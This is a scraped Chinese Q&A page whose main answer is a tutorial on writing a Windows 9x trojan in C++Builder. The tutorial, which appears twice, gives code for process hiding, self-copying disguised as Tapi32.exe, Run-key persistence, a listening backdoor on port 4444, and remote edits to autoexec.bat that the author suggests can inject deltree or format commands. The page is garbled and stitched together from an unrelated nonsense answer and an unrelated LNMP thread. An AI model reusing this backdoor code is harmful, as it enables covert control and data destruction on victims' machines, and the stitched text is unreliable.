简单的木马怎么编写啊?

Posted 2023-04-21

特洛依木马这个名词大家应该不陌生，自从98年“死牛崇拜”黑客小组公布Back Orifice以来，木马犹如平地上的惊雷， 使在Dos——Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒，终于认识到的网络也有它邪恶的一面，一时间人心惶惶。

我那时在《电脑报》上看到一篇文章，大意是一个菜鸟被人用BO控制了，吓得整天吃不下饭、睡不着觉、上不了网，到处求救！要知道，木马（Trojan）的历史是很悠久的：早在AT&T Unix和BSD Unix十分盛行的年代，木马是由一些玩程式（主要是C）水平很高的年轻人（主要是老美）用C或Shell语言编写的，基本是用来窃取登陆主机的口令，以取得更高的权限。那时木马的主要方法是诱骗——先修改你的.profile文件，植入木马；当你登陆时将你敲入的口令字符存入一个文件，用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的熏陶下长大的，对网络可以说很陌生。直到Win9x横空出世，尤其是WinNt的普及，大大推动了网络事业的发展的时候，BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马（甚至在Win9x的“关闭程序”对话框可以看到进程）给了当时中国人极大的震撼，它在中国的网络安全方面可以说是一个划时代的软件。

自己编写木马，听起来很Cool是不是？！木马一定是由两部分组成——服务器程序（Server）和客户端程序（Client），服务器负责打开攻击的道路，就像一个内奸特务；客户端负责攻击目标，两者需要一定的网络协议来进行通讯（一般是TCP/IP协议）。为了让大家更好的了解木马攻击技术，破除木马的神秘感，我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马，使大家能更好地防范和查杀各种已知和未知的木马。

首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi，这里我们选用C++Builder（以下简称BCB）；VC虽然好，但GUI设计太复杂，为了更好地突出我的例子，集中注意力在木马的基本原理上，我们选用可视化的BCB；Delphi也不错，但缺陷是不能继承已有的资源（如“死牛崇拜”黑客小组公布的BO2000源代码，是VC编写的，网上俯拾皆是）；VB嘛，谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60.dll吗？
启动C++Builder 5.0企业版，新建一个工程，添加三个VCL控件：一个是Internet页中的Server Socket，另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序，可以对外服务（对攻击者敞开大门）。Socket最初是在Unix上出现的，后来微软将它引入了Windows中（包括Win98和WinNt）；后两个控件的作用是用来使程序具有FTP（File Transfer Protocol文件传输协议）和SMTP（Simple Mail Transfer Protocol简单邮件传输协议）功能，大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。

Form窗体是可视的，这当然是不可思议的。不光占去了大量的空间（光一个Form就有300K之大），而且使软件可见，根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form，就像Delphi用过程实现的小程序一般只有17K左右那样。

我们首先应该让我们的程序能够隐身。双击Form，首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘，其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此，只要将我们的程序在进程数据库中用RegisterServiceProcess（）函数注册成服务进程（Service Process）就可以了。不过该函数的声明在Borland预先打包的头文件中没有，那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。

首先判断目标机的操作系统是Win9x还是WinNt：


DWORD dwVersion = GetVersion（）;
// 得到操作系统的版本号
if （dwVersion >= 0x80000000）
// 操作系统是Win9x，不是WinNt

typedef DWORD （CALLBACK* LPREGISTERSERVICEPROCESS）（DWORD,DWORD）;
//定义RegisterServiceProcess（）函数的原型
HINSTANCE hDLL;
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL = LoadLibrary（"KERNEL32"）;
//加载RegisterServiceProcess（）函数所在的动态链接库KERNEL32.DLL
lpRegisterServiceProcess = （LPREGISTERSERVICEPROCESS）GetProcAddress（hDLL,"RegisterServiceProcess"）;
//得到RegisterServiceProcess（）函数的地址
lpRegisterServiceProcess（GetCurrentProcessId（）,1）;
//执行RegisterServiceProcess（）函数,隐藏本进程
FreeLibrary（hDLL）;
//卸载动态链接库



这样就终于可以隐身了（害我敲了这么多代码！）。为什么要判断操作系统呢？因为WinNt中的进程管理器可以对当前进程一览无余，因此没必要在WinNt下也使用以上代码（不过你可以使用其他的方法，这个留到后面再讲）。
接着再将自己拷贝一份到%System%目录下，例如：C:\Windows\System，并修改注册表，以便启动时自动加载：


char TempPath[MAX_PATH];
//定义一个变量
GetSystemDirectory（TempPath ,MAX_PATH）;
//TempPath是system目录缓冲区的地址,MAX_PATH是缓冲区的大小，得到目标机的System目录路径
SystemPath=AnsiString（TempPath）;
//格式化TempPath字符串，使之成为能供编译器使用的样式
CopyFile（ParamStr（0）.c_str（）, AnsiString（SystemPath+"\\Tapi32.exe"）.c_str（） ,FALSE）;
//将自己拷贝到%System%目录下，并改名为Tapi32.exe，伪装起来
Registry=new TRegistry;
//定义一个TRegistry对象，准备修改注册表，这一步必不可少
Registry->RootKey=HKEY_LOCAL_MACHINE;
//设置主键为HKEY_LOCAL_MACHINE
Registry->OpenKey（"Software\\Microsoft\\Windows\\
CurrentVersion\\Run",TRUE）;
//打开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run，如果不存在，就创建之
try

//如果以下语句发生异常，跳至catch，以避免程序崩溃
if（Registry->ReadString（"crossbow"）!=SystemPath+"\\Tapi32.exe"）
Registry->WriteString（"crossbow",SystemPath+"\\Tapi32.exe"）;
//查找是否有“crossbow”字样的键值，并且是否为拷贝的目录%System%+Tapi32.exe
//如果不是，就写入以上键值和内容

catch（...）

//如果有错误，什么也不做



好，FormCreate过程完成了，这样每次启动都可以自动加载Tapi32.exe，并且在“关闭程序”对话框中看不见本进程了，木马的雏形初现。

接着选中ServerSocket控件，在左边的Object Inspector中将Active改为true，这样程序一启动就打开特定端口，处于服务器工作状态。再将Port填入4444，这是木马的端口号，当然你也可以用别的。但是你要注意不要用1024以下的低端端口，因为这样不但可能会与基本网络协议使用的端口相冲突，而且很容易被发觉，因此尽量使用1024以上的高端端口（不过也有这样一种技术，它故意使用特定端口，因为如果引起冲突，Windows也不会报错 ^_^）。你可以看一看TNMFTP控件使用的端口，是21号端口，这是FTP协议的专用控制端口（FTP Control Port）；同理TNMSMTP的25号端口也是SMTP协议的专用端口。

再选中ServerSocket控件，点击Events页，双击OnClientRead事件，敲入以下代码：


FILE *fp=NULL;
char * content;
int times_of_try;
char TempFile[MAX_PATH];
//定义了一堆待会儿要用到的变量
sprintf（TempFile, "%s%2 参考技术A 首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi，这里我们选用C++Builder（以下简称BCB）；VC虽然好，但GUI设计太复杂，为了更好地突出我的例子，集中注意力在木马的基本原理上，我们选用可视化的BCB；Delphi也不错，但缺陷是不能继承已有的资源（如“死牛崇拜”黑客小组公布的BO2000源代码，是VC编写的，网上俯拾皆是）；VB嘛，谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60.dll吗？

启动C++Builder 5.0企业版，新建一个工程，添加三个VCL控件：一个是Internet页中的Server Socket，另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序，可以对外服务（对攻击者敞开大门）。Socket最初是在Unix上出现的，后来微软将它引入了Windows中（包括Win98和WinNt）；后两个控件的作用是用来使程序具有FTP（File Transfer Protocol文件传输协议）和SMTP（Simple Mail Transfer Protocol简单邮件传输协议）功能，大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。

Form窗体是可视的，这当然是不可思议的。不光占去了大量的空间（光一个Form就有300K之大），而且使软件可见，根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form，就像Delphi用过程实现的小程序一般只有17K左右那样。

我们首先应该让我们的程序能够隐身。双击Form，首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘，其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此，只要将我们的程序在进程数据库中用RegisterServiceProcess()函数注册成服务进程（Service Process）就可以了。不过该函数的声明在Borland预先打包的头文件中没有，那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。

首先判断目标机的操作系统是Win9x还是WinNt：


DWORD dwVersion = GetVersion();
// 得到操作系统的版本号
if (dwVersion >= 0x80000000)
// 操作系统是Win9x，不是WinNt

typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
file://定/义RegisterServiceProcess()函数的原型
HINSTANCE hDLL;
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL = LoadLibrary("KERNEL32");
file://加/载RegisterServiceProcess()函数所在的动态链接库KERNEL32.DLL
lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");
file://得/到RegisterServiceProcess()函数的地址
lpRegisterServiceProcess(GetCurrentProcessId(),1);
file://执/行RegisterServiceProcess()函数,隐藏本进程
FreeLibrary(hDLL);
file://卸/载动态链接库



这样就终于可以隐身了（害我敲了这么多代码！）。为什么要判断操作系统呢？因为WinNt中的进程管理器可以对当前进程一览无余，因此没必要在WinNt下也使用以上代码（不过你可以使用其他的方法，这个留到后面再讲）。接着再将自己拷贝一份到%System%目录下，例如：

C:\Windows\System，并修改注册表，以便启动时自动加载：


char TempPath[MAX_PATH];
file://定/义一个变量
GetSystemDirectory(TempPath ,MAX_PATH);
file://TempPath/是system目录缓冲区的地址,MAX_PATH是缓冲区的大小，得到目标机的System目录路径
SystemPath=AnsiString(TempPath);
file://格/式化TempPath字符串，使之成为能供编译器使用的样式
CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE);
file://将/自己拷贝到%System%目录下，并改名为Tapi32.exe，伪装起来
Registry=new TRegistry;
file://定/义一个TRegistry对象，准备修改注册表，这一步必不可少
Registry->RootKey=HKEY_LOCAL_MACHINE;
file://设/置主键为HKEY_LOCAL_MACHINE
Registry->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE);
file://打/开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run，如果不存在，就创建之
try

file://如/果以下语句发生异常，跳至catch，以避免程序崩溃
if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")
Registry->WriteString("crossbow",SystemPath+"\\Tapi32.exe");
file://查/找是否有“crossbow”字样的键值，并且是否为拷贝的目录%System%+Tapi32.exe
file://如/果不是，就写入以上键值和内容

catch(...)

file://如/果有错误，什么也不做



好，FormCreate过程完成了，这样每次启动都可以自动加载Tapi32.exe，并且在“关闭程序”对话框中看不见本进程了，木马的雏形初现。

接着选中ServerSocket控件，在左边的Object Inspector中将Active改为true，这样程序一启动就打开特定端口，处于服务器工作状态。再将Port填入4444，这是木马的端口号，当然你也可以用别的。但是你要注意不要用1024以下的低端端口，因为这样不但可能会与基本网络协议使用的端口相冲突，而且很容易被发觉，因此尽量使用1024以上的高端端口（不过也有这样一种技术，它故意使用特定端口，因为如果引起冲突，Windows也不会报错 ^_^）。你可以看一看TNMFTP控件使用的端口，是21号端口，这是FTP协议的专用控制端口（FTP Control Port）；同理TNMSMTP的25号端口也是SMTP协议的专用端口。

再选中ServerSocket控件，点击Events页，双击OnClientRead事件，敲入以下代码：


FILE *fp=NULL;
char * content;
int times_of_try;
char TempFile[MAX_PATH];
file://定/义了一堆待会儿要用到的变量
sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str());
file://在%System%下/建立一个文本文件Win369.bat，作为临时文件使用
AnsiString temp=Socket->ReceiveText();
file://接/收客户端（攻击者，也就是你自己）传来的数据


好，大门敞开了！接着就是修改目标机的各种配置了！^_^ 首先我们来修改Autoexec.bat和Config.sys吧：


if(temp.SubString(0,9)=="edit conf")
file://如/果接受到的字符串的前9个字符是“edit conf”

int number=temp.Length();
file://得/到字符串的长度
int file_name=atoi((temp.SubString(11,1)).c_str());
file://将/第11个字符转换成integer型，存入file_name变量
file://为/什么要取第11个字符，因为第10个字符是空格字符
content=(temp.SubString(12,number-11)+'\n').c_str();
file://余/下的字符串将被作为写入的内容写入目标文件
FILE *fp=NULL;
char filename[20];
chmod("c:\\autoexec.bat",S_IREAD|S_IWRITE);
chmod("c:\\config.sys",S_IREAD|S_IWRITE);
file://将/两个目标文件的属性改为可读可写
if(file_name==1)
sprintf(filename,"%s","c:\\autoexec.bat");
file://如/果第11个字符是1,就把Autoexec.bat格式化
else if(file_name==2)
sprintf(filename,"%s","c:\\config.sys");
file://如/果第11个字符是1,就把Config.sys格式化
times_of_try=0;
file://定/义计数器
while(fp==NULL)

file://如/果指针是空
fp=fopen(filename,"a+");
file://如/果文件不存在，创建之；如果存在，准备在其后添加
file://如/果出错，文件指针为空，这样就会重复
times_of_try=times_of_try+1;
file://计/数器加1
if(times_of_try>100)

file://如/果已经试了100次了，仍未成功
Socket->SendText("Fail By Open File");
file://就/发回“Fail By Open File”的错误信息
goto END;
file://跳/至END处


fwrite(content,sizeof(char),strlen(content),fp);
file://写/入添加的语句，例如deltree/y C:或者format/q/autotest C:，够毒吧？！
fclose(fp);
file://写/完后关闭目标文件
Socket->SendText("Sucess");
file://然/后发回“Success”的成功信息



你现在可以通过网络来察看目标机上的这两个文件了，并且还可以向里面随意添加任何命令。 参考技术B 回答

你好，感谢您的信任我是汐汐老师，我将马上为您解答，因为整理答案都需要时间，我将在三分钟内为您解答，请稍等一下哦，您也可以补充一个问题哦珞

在桌面找到啊哈c,然后双击打开。2.在的下一行写 while(1>0) printf(“1 0”); 3.然后你点击运行以后,如果编译失败了。会有提示的。如果成功就会弹出编译成功,这时候只要点击确定或者是x。4.由于某些原因,当点击运行以后,电脑的杀毒软件会自动检测到木马程序的,然后弹出

四、由于某些原因，当点击运行以后，电脑的杀毒软件会自动检测到木马程序的，然后弹出一个框，点击找回文件

四、点击找回文件会进入另一个界面，勾选你所保存的文件然后点击恢复。

五、当文件恢复以后，啊哈c就会出现编译成功字样，这时候你可以点确定，也可以是x。不管点那个，这个文件都会运行。

六、当点击确定以后，这个程序就开始运行了。如何出现另一个界面，这个界面就是木马程序的运行界面，界面全是0和1的。



想打开一个网页，结果提示：“恭喜，LNMP一键安装包安装成功”，是啥意思啊，木马病毒吗？我要怎么删除

是电脑菜鸟，望给予详细删除攻略。谢谢

是13年的问题，今年16年了，但是看了这些答案我也是醉了，你打开网页提示 是你打开的那个站点的提示，根本原因是因为人家站点刚好安装了LNMP，网站内容海没有来得及upload上去，所以 只有这个提示。 参考技术A

您好

1，这应该是一个网络服务器架构的文件安装包

2，如果不需要的话，可以到腾讯电脑管家官网下载一个电脑管家。

3，通过电脑管家——软件管理——软件仓库——找到该软件——卸载——强力清除即可。

4，平时上网注意同步开启电脑管家，电脑管家拥有16层实时防护功能，如果遇到了这种情况，电脑管家是可以拦截的。

如果还有其他疑问和问题，欢迎再次来电脑管家企业平台进行提问，我们将尽全力为您解答疑难

参考技术B LNMP一键安装包是一个用Linux Shell编写的可以为CentOS/RadHat、Debian/Ubuntu VPS(VDS)或独立主机安装LNMP(Nginx、MySQL、PHP、phpMyAdmin)生产环境的Shell程序。
它对你的电脑没有任何危害，当然，对你也没有任何用处，留着它也行，就当家中多了一个杯子，不想留着它，就用360软件管家卸载!追问

可是360软件管家没有看见LNMP的这个名称啊？

追答

第一步：使用安装包卸载-找到LNMP一键安装包官方安装版，点击"开始"进入"设置"在控制面板里择添加或删除软件 第二步：点击后弹出更改或删除程序对话框，在LNMP一键安装包官方安装版左下方点击"更改或 删除"按钮 第三步：点击确定删除LNMP一键安装包 官方安装版 这样LNMP一键安装包 V0.9 官方安装版就成功从电脑上卸载了。方法二 用注册表编辑器，打开HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼Uninstall，找到LNMP一键安装包的UninstallString的字符串键，将键值拷入到"运行"窗口，点击运行就会启动LNMP一键安装包 V0.9 官方安装版卸载程序，按步骤操作完成即可。

参考技术C 不是，不过这个软件如果没有用的话，建议删除掉。追问

就是不知道怎么删除

追答

出现这个的时候，点击右键，看看属性，或者利用windows自带的搜索功能搜索下，找到后删除即可。

追问

都不知道文件安装在哪里，搜索lnmp也搜索 不到

追答

如果不影响计算机运行的话，可以不用管。如果影响的话，那你得费点时间找下。位置貌似是
c:\windows\system32\driver\etc\hosts

本回答被提问者和网友采纳